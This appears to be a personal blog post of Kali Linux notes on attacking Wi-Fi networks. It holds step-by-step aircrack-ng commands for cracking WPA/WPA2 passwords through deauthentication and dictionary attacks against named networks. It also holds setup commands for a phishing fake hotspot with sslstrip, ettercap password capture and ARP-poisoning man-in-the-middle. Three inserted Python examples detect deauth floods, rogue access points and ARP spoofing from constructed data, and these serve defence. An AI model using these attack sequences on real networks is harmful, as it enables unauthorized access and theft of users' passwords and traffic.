Category: Network and Security

2015-09-08 23:29:04


kali --- cracking wifi passwords with aircrack-ng

1. Download and install aircrack-ng
    a. Install it straight from the package sources
        apt-get install aircrack-ng
    b. Download and build it yourself
        Download aircrack-ng-1.1.tar.gz()
        Unpack it, enter the unpacked directory, run make against the Makefile, then install with make Makefile install
        openssl may need to be installed first for the build to succeed.
        You can install openssl with the command
        apt-get install libssl-dev

2. Bring up the wireless card. Open a terminal and run ifconfig -a to check whether wlan is up; if it is, go on to the next step. This also shows the machine's own MAC address.


3. Find the network to crack and start the attack. Open terminal 1.
    a. Use the command
      iwlist wlan0 scanning

      On some wireless cards this command no longer works once the monitor interface wlan0mon has been stopped at the end; the card then has to be restarted. The card used in this test behaves this way.

      Then find the chosen network and note its MAC address, channel, ESSID and so on.
      Use the command
      airmon-ng start wlan0
      to start a monitor interface


4. Open terminal 1

ifconfig
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

rfkill list
rfkill unblock 2

    b. Use the command
      airmon-ng start wlan0

      airodump-ng wlan0mon

airodump-ng wlan0mon
airodump-ng wlan0mon --bssid D8:5D:4C:32:CB:A6
airodump-ng wlan0mon -c 6
airodump-ng wlan0mon --encrypt WPA2
airodump-ng wlan0mon --encrypt OPN
airodump-ng wlan0mon --essid 607
airodump-ng wlan0mon --essid 606-ztg
airodump-ng wlan0 --essid 606-ztg

airodump-ng -w longas wlan0mon --essid aidajingjing

      The wireless networks' addresses now appear on screen.



      The screen lists their MAC addresses and the channels they are on.
      Pick the target network and note its channel and MAC address.


5. Open terminal 2
    Use the command

    airodump-ng -c <channel> --bssid <target MAC> -w name wlan0mon

airodump-ng -c 10 --bssid C8:3A:35:14:AB:18 -w name wlan0mon
airodump-ng -c 10 --bssid 14:75:90:8B:BE:4E -w name wlan0mon

00:23:6C:97:21:89
00:26:C7:72:B2:3C
F0:27:65:6B:09:97
A8:A6:68:1A:D8:1D

    Here name is the file name for the saved capture and can be changed.



6. Open terminal 3
    Use the command

    aireplay-ng -1 0 -a <target MAC> -h <own MAC> wlan0mon

aireplay-ng -1 0 -a C8:3A:35:14:AB:18 -h C8:AA:21:DF:0D:6D wlan0mon

    A success message should now appear. If none appears, the target probably does not support this or the system is unstable, and you need to switch to another target.
    Once it reports success, go on to the next step.

    Then enter the command
    aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b <target MAC> -h <own MAC> wlan0mon

aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b C8:3A:35:14:AB:18 -h C8:AA:21:DF:0D:6D wlan0mon

    The data count in terminal 2 now grows quickly; once it reaches 5000, cracking can begin.

root@debian:~# aireplay-ng -0 1 -a C8:3A:35:14:AB:18 -c C8:AA:21:DF:0D:6D wlan0mon
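The aireplay-ng -0 deauthentication above is exactly what a wireless IDS is built to notice: a burst of deauth or disassoc management frames from one transmitter inside a short window is rarely legitimate. The following is an added example, not code from the original post. It decodes the fixed 802.11 MAC header of raw frames (assumed captured with the radiotap header already stripped, as the DLT_IEEE802_11 link type delivers them) and counts deauth/disassoc frames per transmitter in a sliding time window. The capture it runs on is constructed inline from the BSSID and station that appear in the airodump-ng listing on this page; the threshold and window length are illustrative assumptions.

```python
import struct
from collections import defaultdict, deque

# 802.11 frame-control type/subtype values for the frames we care about
TYPE_MGMT = 0
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_80211(frame: bytes) -> dict:
    """Decode the fixed 24-byte MAC header of a raw 802.11 frame.

    Assumes no radiotap header. For management frames addr1 is the
    receiver, addr2 the transmitter and addr3 the BSSID.
    """
    if len(frame) < 24:
        raise ValueError("frame shorter than an 802.11 MAC header")
    fc = frame[0]
    info = {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "receiver": mac_str(frame[4:10]),
        "transmitter": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "reason": None,
    }
    # deauth/disassoc bodies start with a 2-byte little-endian reason code
    if (info["type"] == TYPE_MGMT
            and info["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC)
            and len(frame) >= 26):
        info["reason"] = struct.unpack("<H", frame[24:26])[0]
    return info


class DeauthFloodDetector:
    """Sliding-window count of deauth/disassoc frames per transmitter."""

    def __init__(self, threshold: int = 10, window_s: float = 5.0):
        self.threshold = threshold          # assumed tuning values
        self.window_s = window_s
        self.events = defaultdict(deque)    # transmitter MAC -> timestamps

    def feed(self, ts: float, frame: bytes):
        info = parse_80211(frame)
        if info["type"] != TYPE_MGMT or info["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            return None                     # only management disconnects count
        q = self.events[info["transmitter"]]
        q.append(ts)
        while q and ts - q[0] > self.window_s:
            q.popleft()                     # expire events outside the window
        if len(q) == self.threshold:        # fire once, as the threshold is crossed
            return {"transmitter": info["transmitter"], "bssid": info["bssid"],
                    "target": info["receiver"], "count": len(q),
                    "window_s": self.window_s, "reason": info["reason"]}
        return None


def sample_frame(fc0: int, addr1: str, addr2: str, addr3: str, body: bytes = b"") -> bytes:
    """Constructed test bytes for the parser (fc0 = first frame-control byte)."""
    raw = lambda m: bytes(int(x, 16) for x in m.split(":"))
    return bytes([fc0, 0x00]) + b"\x3a\x01" + raw(addr1) + raw(addr2) + raw(addr3) + b"\x00\x00" + body


AP = "c8:3a:35:14:ab:18"         # BSSID from the airodump-ng listing on this page
CLIENT = "c8:aa:21:df:0d:6d"     # the associated station from that listing
OTHER_AP = "00:23:6c:97:21:89"   # another BSSID noted on this page
BROADCAST = "ff:ff:ff:ff:ff:ff"


def build_capture() -> list:
    """Constructed trace: normal traffic, one genuine disassoc, then 12 deauths."""
    cap = [(0.0, sample_frame(0x80, BROADCAST, AP, AP)),      # beacon (mgmt subtype 8)
           (0.5, sample_frame(0x08, AP, CLIENT, AP)),         # data frame (type 2)
           (0.7, sample_frame(0xA0, CLIENT, OTHER_AP, OTHER_AP, struct.pack("<H", 8)))]
    for i in range(12):                                       # 0xC0 = mgmt subtype 12 (deauth)
        cap.append((1.0 + 0.1 * i, sample_frame(0xC0, CLIENT, AP, AP, struct.pack("<H", 7))))
    return cap


def run_detector(capture=None, threshold: int = 10, window_s: float = 5.0) -> list:
    det = DeauthFloodDetector(threshold, window_s)
    alerts = []
    for ts, frame in (capture or build_capture()):
        alert = det.feed(ts, frame)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in run_detector():
        print(f"ALERT deauth flood: {a['count']} frames in {a['window_s']}s "
              f"from {a['transmitter']} to {a['target']} (reason {a['reason']})")
```

The single genuine disassoc from the other AP never reaches the threshold, so only the burst from the AP's own address produces an alert; on a real sensor the transmitter address is what to compare against the AP inventory, since a spoofed deauth carries the legitimate BSSID as its source.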



7. Open terminal 4
    Use the command (the capture prefix used here was longas)
aircrack-ng name*.cap

aircrack-ng -w /root/桌面/aircrack-ng-dictionary/all.lst longas*.cap

    name is the file name you chose yourself

    Cracking now starts. If you ran several sets, there may be several results, which you select with the digits 1, 2, 3.
    If the key is not recovered, the program automatically waits until another 5000 packets have arrived and tries again.
    Barring surprises, you eventually recover this network's wireless password.


8. Finally
    In one terminal enter the command
    airmon-ng stop wlan0mon

    to end the monitor session
    (airmon-ng check shows how many monitor interfaces you have started; when running several sets you can check and then choose which to stop)

++++++++++++++++++++++++++ Cracking WPA/WPA2-PSK wireless networks with Aircrack-ng ++++++++++++++++++++++++++++++++++
 CH  1 ][ Elapsed: 4 mins ][ 2015-09-07 07:53                                         
                                                                  
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 C8:3A:35:14:AB:18   -3      748      154    0  10  54e  WPA  CCMP   PSK  606-ztg
                                                                  
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 C8:3A:35:14:AB:18  C8:AA:21:DF:0D:6D  -25    1e- 1e     0      156




Open terminal 1
ifconfig -a
airmon-ng start wlan0
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

rfkill list
rfkill unblock 2

airodump-ng -w name wlan0mon
airodump-ng -w name wlan0mon --essid 606-ztg

Open terminal 2
airodump-ng -c 10 --bssid C8:3A:35:14:AB:18 -w log wlan0mon

Open terminal 3
aireplay-ng -0 1 -a C8:3A:35:14:AB:18 -c C8:AA:21:DF:0D:6D wlan0mon

Open terminal 4
aircrack-ng -w /root/桌面/aircrack-ng-dictionary/all.lst log*.cap


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

ifconfig
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

rfkill list
rfkill block 2
rfkill unblock 2

airmon-ng start wlan0
airmon-ng stop wlan0


airodump-ng wlan0mon
airodump-ng wlan0mon --bssid D8:5D:4C:32:CB:A6
airodump-ng wlan0mon -c 6
airodump-ng wlan0mon --encrypt WPA2
airodump-ng wlan0mon --encrypt OPN
airodump-ng wlan0mon --essid 607

airodump-ng -w longas wlan0mon --essid aidajingjing


+++++++++++++++++++++++ 7.5  Example: creating a phishing WiFi hotspot in Kali Linux +++++++++++++++++++++++++++++++++++++

ifconfig -a
airmon-ng start wlan0          # put the card into monitor mode
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

rfkill list
rfkill unblock 2
airbase-ng -c 12 -e ztg wlan0mon


root@debian:~# iw wlan0mon del
root@debian:~# iw wlan0 del
root@debian:~# iw phy phy0 interface add wlan0 type monitor
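From the network owner's side, the airbase-ng hotspot in this section is an evil twin: one of their ESSIDs served by a BSSID that is not theirs, usually open rather than WPA-protected. A simple detection is to parse the CSV that airodump-ng -w <prefix> writes (<prefix>-01.csv) and compare every access point advertising one of your ESSIDs against an inventory of the BSSIDs and security you actually run. The following is an added example, not code from the original post: the CSV text and the KNOWN_APS inventory are constructed (the 606-ztg and 607 entries mirror the airodump-ng listing earlier on this page, the 00:11:22:33:44:55 BSSID is invented), and the column layout follows airodump-ng's CSV header.

```python
import csv
import io

# Constructed sample in the column layout of airodump-ng's <prefix>-01.csv:
# an access-point table, a blank line, then a station table.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
C8:3A:35:14:AB:18, 2015-09-07 07:49:10, 2015-09-07 07:53:01, 10, 54, WPA, CCMP, PSK, -3, 748, 154, 0.0.0.0, 7, 606-ztg,
00:23:6C:97:21:89, 2015-09-07 07:49:12, 2015-09-07 07:52:58, 6, 54, WPA2, CCMP, PSK, -60, 310, 0, 0.0.0.0, 3, 607,
00:11:22:33:44:55, 2015-09-07 07:51:40, 2015-09-07 07:53:00, 12, 54, OPN, , , -20, 90, 0, 0.0.0.0, 7, 606-ztg,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
C8:AA:21:DF:0D:6D, 2015-09-07 07:49:15, 2015-09-07 07:53:01, -25, 156, C8:3A:35:14:AB:18, 606-ztg
"""

# Constructed inventory of the access points the site actually operates
KNOWN_APS = {
    "606-ztg": {"bssids": {"c8:3a:35:14:ab:18"}, "privacy": "WPA"},
    "607": {"bssids": {"00:23:6c:97:21:89"}, "privacy": "WPA2"},
}


def parse_airodump_csv(text: str) -> list:
    """Return the access-point rows (as dicts) from an airodump-ng CSV dump."""
    # the AP table ends at the blank line that precedes the station table
    ap_section = text.lstrip("\n").split("\n\n", 1)[0]
    reader = csv.DictReader(io.StringIO(ap_section), skipinitialspace=True)
    rows = []
    for row in reader:
        rows.append({k.strip(): (v or "").strip()
                     for k, v in row.items() if k is not None})
    return rows


def find_rogue_aps(rows: list, known: dict) -> list:
    """Flag any AP that advertises one of our ESSIDs from an unknown BSSID
    or with a different security setting than the inventory records."""
    findings = []
    for ap in rows:
        essid, bssid, privacy = ap["ESSID"], ap["BSSID"].lower(), ap["Privacy"]
        if essid not in known:
            continue                        # a neighbour's network, not ours
        expected = known[essid]
        reasons = []
        if bssid not in expected["bssids"]:
            reasons.append(f"BSSID {bssid} is not an inventoried AP for {essid!r}")
        if privacy != expected["privacy"]:
            reasons.append(f"advertises {privacy} security, inventory says {expected['privacy']}")
        if reasons:
            findings.append({"essid": essid, "bssid": bssid,
                             "channel": ap["channel"], "reasons": reasons})
    return findings


def scan_report(text: str = SAMPLE_CSV, known: dict = KNOWN_APS) -> list:
    return find_rogue_aps(parse_airodump_csv(text), known)


if __name__ == "__main__":
    for f in scan_report():
        print(f"ROGUE AP {f['bssid']} on channel {f['channel']} for ESSID {f['essid']!r}:")
        for r in f["reasons"]:
            print("   -", r)
```

Run periodically against a fresh airodump-ng dump, the report flags the open twin of 606-ztg on channel 12 while the two inventoried access points pass; stations listed in the second table as associated to a flagged BSSID are the clients to contact.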


+++++++++++++++++++++++ Hands-on WiFi phishing test with Kali +++++++++++++++++++++++++++++++++++++
route -n -A inet | grep UG

0.0.0.0         10.108.160.1    0.0.0.0         UG    1024   0        0 eth0
10.3.9.31       10.108.160.1    255.255.255.255 UGH   1      0        0 eth0

gatewayip = 10.108.160.1
internet_interface = eth0
fakeap_interface = wlan0
ESSID = aaaa


-------Terminal window 1

ifconfig -a

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

SIOCSIFFLAGS: Operation not possible due to RF-kill

rfkill list

0: phy0: Wireless LAN
    Soft blocked: yes
    Hard blocked: no
1: tpacpi_bluetooth_sw: Bluetooth
    Soft blocked: no
    Hard blocked: no
2: hci0: Bluetooth
    Soft blocked: no
    Hard blocked: no

rfkill unblock 1
ifconfig wlan0 up
airmon-ng start wlan0
root@debian:~# airbase-ng -e ztg wlan0


airbase-ng wlan0 -e ztg -c 10




airbase-ng wlan0mon -e ztg -c 10

iw wlan0 del; iw wlan0mon del; iw phy phy0 interface add wlan0 type monitor;

iw wlan0 del; iw phy phy0 interface add wlan0 type monitor; ifconfig wlan0 up; ifconfig wlan0 mtu 1400; airmon-ng start wlan0; airbase-ng wlan0 -e ztg -c 10

ifconfig wlan0 down; ifconfig wlan0 up; ifconfig wlan0 mtu 1400; airbase-ng wlan0 -e ztg -c 10
-------

//airmon-ng start wlan0
//airbase-ng -c 12 -e ztg wlan0


-------Terminal window 2
root@debian:~# ifconfig at0 up; ifconfig at0 192.168.1.1 netmask 255.255.255.0; ifconfig at0 mtu 1420; ifconfig wlan0 mtu 1460; route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1; echo 1 > /proc/sys/net/ipv4/ip_forward; iptables -F; iptables -X; iptables -Z; iptables -t nat -F; iptables -t nat -X; iptables -t nat -Z; iptables -t mangle -F; iptables -t mangle -X; iptables -t mangle -Z; iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -t nat -P PREROUTING ACCEPT; iptables -t nat -P OUTPUT ACCEPT; iptables -t nat -P POSTROUTING ACCEPT; iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE;

root@debian:~# ifconfig at0 up; ifconfig at0 192.168.1.1 netmask 255.255.255.0; route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1; echo 1 > /proc/sys/net/ipv4/ip_forward; iptables -F; iptables -X; iptables -Z; iptables -t nat -F; iptables -t nat -X; iptables -t nat -Z; iptables -t mangle -F; iptables -t mangle -X; iptables -t mangle -Z; iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -t nat -P PREROUTING ACCEPT; iptables -t nat -P OUTPUT ACCEPT; iptables -t nat -P POSTROUTING ACCEPT; iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE;

-------

# Tables

ifconfig at0 up
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1420
ifconfig wlan0 mtu 1460
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -F
iptables -X
iptables -Z
iptables -t nat -F
iptables -t nat -X
iptables -t nat -Z
iptables -t mangle -F
iptables -t mangle -X
iptables -t mangle -Z
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P OUTPUT ACCEPT
iptables -t nat -P POSTROUTING ACCEPT
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE

//iptables -A FORWARD -i eth0 -o at0 -m state --state ESTABLISHED,RELATED -j ACCEPT
//iptables -A FORWARD -i at0 -o eth0 -j ACCEPT
//iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
//iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE
//iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j SNAT --to-source 10.108.160.1
//iptables -t nat -A PREROUTING -i at0 -j DNAT --to-source 10.108.160.1


-------Terminal window 3
root@debian:~# /etc/init.d/isc-dhcp-server stop; dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0
-------

# DHCP

#dhcpd -d -f -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0
dhcpd -cf /etc/dhcp/dhcpd.conf at0
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server restart
/etc/init.d/isc-dhcp-server start
/etc/init.d/isc-dhcp-server stop


dhcpd -d -f -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0; /etc/init.d/isc-dhcp-server restart;


-------Terminal window 4
root@debian:~# driftnet -i at0
-------


-------Terminal window 4
root@debian:~# sslstrip -f -p -k 10000
-------

-------Terminal window 5
root@debian:~# ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0
-------

-------Terminal window 6
root@debian:~# mkdir -p "/pentest/wireless/airssl/driftnetdata"
root@debian:~# driftnet -i eth0 -p -d /pentest/wireless/airssl/driftnetdata
-------



export PATH=$PATH:/mnt/opt/android-on-linux/android-sdk-linux/platform-tools/



iwconfig wlan0 txpower 15
iw dev wlan0 set txpower fixed 30

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #source NAT on eth0
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #forward wireless traffic to the wired card (or whichever card has Internet access)
iptables -A FORWARD -p tcp --syn -s 192.168.1.0/24 -j TCPMSS --set-mss 1356 #change the maximum segment size

iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0
iw phy0 info
iw wlan0 info

root@debian:~# cat /etc/NetworkManager/system-connections/

++++++++++++++Setting transmit power
iw list
ifconfig wlan0 down
iw reg set BO
iwconfig wlan0 channel 13
iwconfig wlan0 txpower 30
ifconfig wlan0 up

+++++++++++++++++++

ettercap -T -q -M ARP //192.168.0.1/ //192.168.0.101/
ettercap -T -q -M ARP //192.168.0.1/ //192.168.0.101/
ettercap -T -M arp:remote //192.168.0.1/ //192.168.1.101/
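The ettercap -M arp lines above poison the ARP caches of a gateway and a host. The standard counter on the defensive side is arpwatch-style monitoring: learn IP-to-MAC bindings from every ARP packet on the segment and alert when a binding changes, when a pinned address such as the default gateway is claimed by a different MAC, or when the Ethernet source and the ARP sender disagree. The following is an added example, not code from the original post. It decodes Ethernet II/ARP from raw bytes and runs over a constructed trace that reuses the 192.168.0.1 and 192.168.0.101 addresses from the commands above; all MAC addresses in it are invented.

```python
import struct
from ipaddress import IPv4Address

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_arp(packet: bytes):
    """Decode an Ethernet II frame carrying IPv4-over-Ethernet ARP; None otherwise."""
    if len(packet) < 42:
        return None
    if struct.unpack("!H", packet[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", packet[14:22])
    if htype != 1 or ptype != 0x0800 or hlen != 6 or plen != 4:
        return None
    return {
        "op": op,
        "eth_src": mac_str(packet[6:12]),
        "sender_mac": mac_str(packet[22:28]),
        "sender_ip": str(IPv4Address(packet[28:32])),
        "target_mac": mac_str(packet[32:38]),
        "target_ip": str(IPv4Address(packet[38:42])),
    }


class ArpWatch:
    """Track IP -> MAC bindings seen in ARP and report suspicious changes."""

    def __init__(self, pinned=None):
        self.pinned = {ip: m.lower() for ip, m in (pinned or {}).items()}
        self.table = {}                      # ip -> MAC last seen claiming it

    def feed(self, packet: bytes):
        arp = parse_arp(packet)
        if arp is None or arp["op"] not in (ARP_REQUEST, ARP_REPLY):
            return None
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        if ip == "0.0.0.0":
            return None                      # ARP probe: no binding is claimed
        problems = []
        if arp["eth_src"] != mac:
            problems.append(f"Ethernet source {arp['eth_src']} != ARP sender {mac}")
        if ip in self.pinned and mac != self.pinned[ip]:
            problems.append(f"pinned host {ip} claimed by {mac}, expected {self.pinned[ip]}")
        old = self.table.get(ip)
        if old is not None and old != mac:
            problems.append(f"{ip} changed from {old} to {mac}")
        self.table[ip] = mac
        return {"ip": ip, "mac": mac, "op": arp["op"], "alerts": problems} if problems else None


def sample_arp(op, sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Constructed test bytes, never sent on the wire."""
    raw = lambda m: bytes(int(x, 16) for x in m.split(":"))
    dst = "ff:ff:ff:ff:ff:ff" if target_mac == "00:00:00:00:00:00" else target_mac
    eth = raw(dst) + raw(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) + raw(sender_mac)
           + IPv4Address(sender_ip).packed + raw(target_mac) + IPv4Address(target_ip).packed)
    return eth + arp


GATEWAY_IP, GATEWAY_MAC = "192.168.0.1", "aa:bb:cc:00:00:01"     # MACs are invented
HOST_IP, HOST_MAC = "192.168.0.101", "aa:bb:cc:00:00:65"
SPOOF_MAC = "de:ad:be:ef:00:01"


def build_trace() -> list:
    """Constructed trace: a normal resolution, then poisoned replies to both sides."""
    return [
        sample_arp(ARP_REQUEST, HOST_MAC, HOST_IP, "00:00:00:00:00:00", GATEWAY_IP),
        sample_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, HOST_MAC, HOST_IP),
        sample_arp(ARP_REPLY, SPOOF_MAC, GATEWAY_IP, HOST_MAC, HOST_IP),
        sample_arp(ARP_REPLY, SPOOF_MAC, HOST_IP, GATEWAY_MAC, GATEWAY_IP),
        b"\x00" * 60,                                    # non-ARP frame, ignored
    ]


def run_watch(trace=None, pinned=None) -> list:
    watch = ArpWatch({GATEWAY_IP: GATEWAY_MAC} if pinned is None else pinned)
    alerts = []
    for packet in (trace or build_trace()):
        result = watch.feed(packet)
        if result:
            alerts.append(result)
    return alerts


if __name__ == "__main__":
    for a in run_watch():
        print(f"ALERT {a['ip']} now claimed by {a['mac']}: " + "; ".join(a["alerts"]))
```

Pinning the gateway binding is what makes the first poisoned reply obvious even if the monitor started after the attack began; without the pin, a watcher that only compares against what it has learned still catches the change, but only when it saw the genuine binding first.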

++++++++++++++++++

root@debian:~# lspci -tv
-[0000:00]-+-00.0  Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor DRAM Controller
           +-01.0-[01]----00.0  NVIDIA Corporation GF117M [GeForce 610M/710M/820M / GT 620M/625M/630M/720M]
           +-02.0  Intel Corporation 4th Gen Core Processor Integrated Graphics Controller
           +-03.0  Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor HD Audio Controller
           +-14.0  Intel Corporation 8 Series/C220 Series Chipset Family USB xHCI
           +-16.0  Intel Corporation 8 Series/C220 Series Chipset Family MEI Controller #1
           +-1a.0  Intel Corporation 8 Series/C220 Series Chipset Family USB EHCI #2
           +-1b.0  Intel Corporation 8 Series/C220 Series Chipset High Definition Audio Controller
           +-1c.0-[02-06]--
           +-1c.1-[07]----00.0  Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter
           +-1c.2-[08-0c]--
           +-1c.3-[0d]----00.0  Realtek Semiconductor Co., Ltd. RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller
           +-1c.4-[0e-12]----00.0  Realtek Semiconductor Co., Ltd. RTS5227 PCI Express Card Reader
           +-1d.0  Intel Corporation 8 Series/C220 Series Chipset Family USB EHCI #1
           +-1f.0  Intel Corporation HM86 Express LPC Controller
           +-1f.2  Intel Corporation 8 Series/C220 Series Chipset Family 6-port SATA Controller 1 [AHCI mode]
           \-1f.3  Intel Corporation 8 Series/C220 Series Chipset Family SMBus Controller
root@debian:~#

root@debian:~# lspci -vnn
07:00.0 Network controller [0280]: Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter [10ec:b723]
    Subsystem: Lenovo Device [17aa:b728]
    Flags: bus master, fast devsel, latency 0, IRQ 17
    I/O ports at 6000 [size=256]
    Memory at f5d00000 (64-bit, non-prefetchable) [size=16K]
    Capabilities: [40] Power Management version 3
    Capabilities: [50] MSI: Enable- Count=1/1 Maskable- 64bit+
    Capabilities: [70] Express Endpoint, MSI 00
    Capabilities: [100] Advanced Error Reporting
    Capabilities: [140] Device Serial Number 00-23-b7-fe-ff-4c-e0-00
    Capabilities: [150] Latency Tolerance Reporting
    Capabilities: [158] L1 PM Substates
    Kernel driver in use: rtl8723be












